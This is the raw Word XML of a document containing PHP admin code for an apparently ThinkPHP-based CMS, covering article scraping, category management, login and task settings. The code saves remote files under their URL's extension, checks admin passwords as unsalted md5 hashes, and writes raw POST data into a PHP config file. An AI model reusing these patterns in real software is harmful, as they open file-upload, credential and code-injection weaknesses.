          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E55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C40A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8D145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['ret'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>采集失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66F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4DD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5D3E6D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$title['1'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB59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=&gt;      $image,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CAF2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'content'       =&gt;      $content,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2BF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=&gt;      $post['typeid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B348A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strtotime($text['1'].":00"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE05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'update_time'   =&gt;      strtotime($text['1'].":00"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBA7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'source'        =&gt;      $text['2'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA4E9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          =&gt;      1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A85B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'template'      =&gt;      '',  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA1E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           =&gt;      50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C98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=&gt;      '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C36F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'description'   =&gt;      '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412B2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'flags'         =&gt;      0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5FA0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'click'         =&gt;      '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA9A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'tags'          =&gt;      '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B004D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=&gt;      '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B01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=&gt;      1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700870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DED2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$db=Db::name('article')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539DC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7CA58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$data=['ret'=&gt;'&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A6A0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B673D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$data=['err'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A159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E90D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1B39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参数值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C773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A4CE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38883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提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273BD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053D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71AC7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52E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upload($img){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C191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$d=ROOT_PATH . 'public/uploads';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DE1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$date=date('Ymd');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38302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$d=$d.'/'.$date.'/';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A696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if(!file_exists($d)){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4CC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mkdir($d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C6EC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633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$geshi=explode('.', $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BAF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$geshi=array_pop($geshi);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710732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$img=file_get_contents($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3138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4759EB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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC3C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907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$geshis=md5($img).'.'.$geshi;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E14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$geshisa=$date.'/'.md5($img).'.'.$geshi;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D941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$d=$d.'/'.$geshis;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CAB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file_put_contents($d,$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDA1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"/public/uploads/".$geshisa;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECFD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87A8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toutiao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52F4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26AFD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D8769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weitoutiao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED6D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39837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8D0E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svideo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C07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002F66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7E83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19178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4D0DC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6BB164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0F5CF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7C450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Typeid extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B22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35682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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C75A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$typedb=Db::name('typeid')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F16A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$typedb=get_tree_option($typedb,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429F73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$this-&gt;assign('data',$typedb);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2AE6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AD8B0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E806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715B77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$typedb=Db::name('typeid')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1437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$typedb=get_tree_option($typedb,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB468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$this-&gt;assign('typeid',$typedb);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03117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$id=input("id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F68BB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FF96B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E9888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$validate=validate('Typeid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE6B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if($validate-&gt;check($post)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C73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2E7BC0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$post['update_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C871E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46B3F8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if($post['tid']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140F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$typename=Db::name('typeid')-&gt;where(['title'=&gt;$post['title'],'tid'=&gt;0])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3559F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if($typename){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57008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栏目名称已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A09A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641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6D9E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$post['create_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E592A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$db=Db::name('typeid')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDF6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BAC81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63F09F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11B6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330619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C09C0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6D32F1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$db=Db::name('typeid')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FCD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A194D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57BB23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14685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496B7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E1B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A281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842D3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$data=["err"=&gt;$validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C22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77E1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10C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19EE4E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$name=Db::name('typeid')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66533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226F69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27351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C0C50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3F833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B33D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25AB7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42B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544E27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5B7D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1E032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02F7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CD4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03A84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68CD62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A3E6C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$arra=['0'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','1'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D9B4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$type='hide';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F06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$db=Db::name('typeid')-&gt;where('id',$id)-&gt;value('hide');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CCE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if($db==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECF4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$hide=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A55A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F814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$hide=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D868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8CAA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$db=Db::name('typeid')-&gt;where('id',$id)-&gt;setField($type,$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6886E1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98A9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$data=['ret'=&gt;$arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','id'=&gt;$hide,'text'=&gt;$arra[$hide]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB0F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A2537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$data=['err'=&gt;$arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCA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B83F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55DDF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D614A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749D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CC22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$data=['err'=&gt;'AJAX</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9689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15EB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CFB7D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1452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hide_app(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619B5B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201D23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8E525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9C95C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$arra=['0'=&gt;'APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','1'=&gt;'APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE98D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$type='app';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6D5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$db=Db::name('typeid')-&gt;where('id',$id)-&gt;value('app');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3089F9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if($db==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382BC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$hide=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02474A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3F4AB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$hide=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5FBA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7161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$db=Db::name('typeid')-&gt;where('id',$id)-&gt;setField($type,$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF8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87B88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$data=['ret'=&gt;$arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','id'=&gt;$hide,'text'=&gt;$arra[$hide]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76383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1CD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$data=['err'=&gt;$arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0D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0118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259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27235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84F2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15AB3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$data=['err'=&gt;'AJAX</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA4A4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3BC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25653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CF7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typedel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172EC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使用采集文章不建议删除分类，否则会影响到采集文章关联分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79575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5B1DA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32658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1210F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$typeid=Db::name('article')-&gt;where('typeid',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4DB4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if(!$typeid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C074B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$db=Db::name('typeid')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF92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80A7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25A885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D084E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52B2CD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771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4A28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栏目下有文章，请先删除文章对应栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49593A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2D16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FC23F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59F975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0EDD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F64F2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7EA83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0BA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95E39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D6F7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add1(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EAE4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$url=url('typeid/add',['mychannel'=&gt;'1','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394730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$this-&gt;redirect($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B207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9A98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add2(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DC7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$url=url('typeid/add',['mychannel'=&gt;'2','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C150C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$this-&gt;redirect($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80F1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ABEC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add3(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E57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$url=url('typeid/add',['mychannel'=&gt;'3','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268258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$this-&gt;redirect($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7177A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EA4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85A5A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D4CA6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209F2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think\Controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141284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256468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Login extends Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800D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34388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_initialize(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9E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if(Session::has('admin','ffxiangAdmin')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D56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$this-&gt;redirect("index/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7C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45C86A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34AF9D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502C7B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58C5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$name=input('post.name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04898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$password=md5(input('post.password'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4F16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$captcha=input('post.yzm');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E3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if($name &amp;&amp; $password){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031F30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if(!$captcha){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8528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['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请输入验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357400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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4BD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if(!captcha_check($captcha)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECDC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['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C64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22F743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$admin = db('admin')-&gt;where(['name'=&gt;$name,'password'=&gt;$password])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB4E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if($admin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A1D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if($admin['hide']&lt;=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF6F4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$data=array("err"=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户被禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1FFA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}else{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E45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db('admin')-&gt;where('id',$admin['id'])-&gt;update(['update_time'=&gt;time(),'update_ip'=&gt;_ip()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201EF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Session::set('admin',$admin,'ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1836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$data=array("ret"=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正在跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4336F4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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4DF9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$data=array("err"=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户和密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006EAB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30BE92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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A185D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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>$data=['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请输入信息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF97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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE74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return json($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA1D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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B3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$this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62245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2850D2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A11B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229AB9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4CD13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6A7838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211C54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56F0E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Renwu extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741022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A1826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config(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B813F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867EC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$this-&gt;assign('cfg',$config['renwu']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1B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472A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D1417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56CBB5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$data=$post;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6007A0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1FA41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$data=var_export($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76244E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$data=str_replace("array", "return", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EEC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097AD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497828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$data="&lt;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD9A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file_put_contents(APP_PATH.'extra/renwu.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EEC3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3FE059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CE03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保存失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022E1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1F94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7A3D1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0299C3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F9D5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E8398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698C17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75F7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EA31D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B50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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56523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$data=Db::name('renwu')-&gt;alias('a')-&gt;field('a.id,a.name,a.money,a.text,a.url,b.title,a.time,a.des,a.hide,a.typeid')-&gt;join('__RENWU_TYPEID__ b','a.typeid=b.id')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B02CF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25D109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F53C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A36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add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E71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406E0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$typedata=Db::name('renwu_typeid')-&gt;where(['hide'=&gt;1])-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59671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$this-&gt;assign('typedata',$typedata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63723F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10C5E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28BFC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0F5942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$post['time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6654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if(!$post['typeid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C957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请选择分组</w:t>
      </w:r>
